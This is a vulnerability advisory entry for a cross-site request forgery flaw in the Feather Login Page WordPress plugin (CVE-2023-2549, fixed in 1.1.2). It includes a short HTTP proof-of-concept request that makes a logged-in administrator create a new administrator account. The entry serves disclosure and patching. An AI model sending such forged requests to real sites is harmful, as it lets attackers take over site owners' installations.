WordPress Plugin Vulnerabilities

Feather Login Page < 1.1.2 - Cross-Site Request Forgery to Privilege Escalation

Description

The plugin does not protect its ftlpp-ext-expirable-login-link action against CSRF attacks, allowing an unauthenticated attacker to add users of any role on their behalf by tricking a logged in administrator to submit a crafted request.

Proof of Concept

POST /wp-admin/admin-ajax.php?action=ftlpp-ext-expirable-login-link HTTP/1.1
Content-Type: application/json
Cookie: [Admin+]

{"firstName":"Evil","email":"evil@example.com","role":"administrator","accountLinkExpiry":"999"}

Affects Plugins

Plugin icon
feather-login-page
Fixed in 1.1.2

References

CVE
CVE-2023-2549
URL
https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/feather-login-page/feather-login-page-107-111-cross-site-request-forgery-to-privilege-escalation

Classification

Type
CSRF
OWASP top 10
A2: Broken Authentication and Session Management
CWE
CWE-352
CVSS
8.8 (high)

Miscellaneous

Original Researcher
Lana Codes
Verified
No
WPVDB ID
69a6d423-b925-458f-b8a3-61836411b524

Timeline

Publicly Published
2023-05-30 (about 11 months ago)
Added
2023-05-31 (about 11 months ago)
Last Updated
2023-07-07 (about 10 months ago)

Other

Published
Title
Published
2024-04-10
Title
Page Builder: Live Composer < 1.5.36 - Cross-Site Request Forgery
Published
2023-02-23
Title
ChatBot < 4.3.0 - Settings Reset via CSRF
Published
2024-04-12
Title
Zoho Campaigns < 2.0.8 - Cross-Site Request Forgery via zcwc_integration_disconnect
Published
2017-08-08
Title
Loginizer <= 1.3.5 - Cross-Site Request Forgery (CSRF)
Published
2021-12-21
Title
Simple Download Monitor < 3.9.9 - Multiple CSRF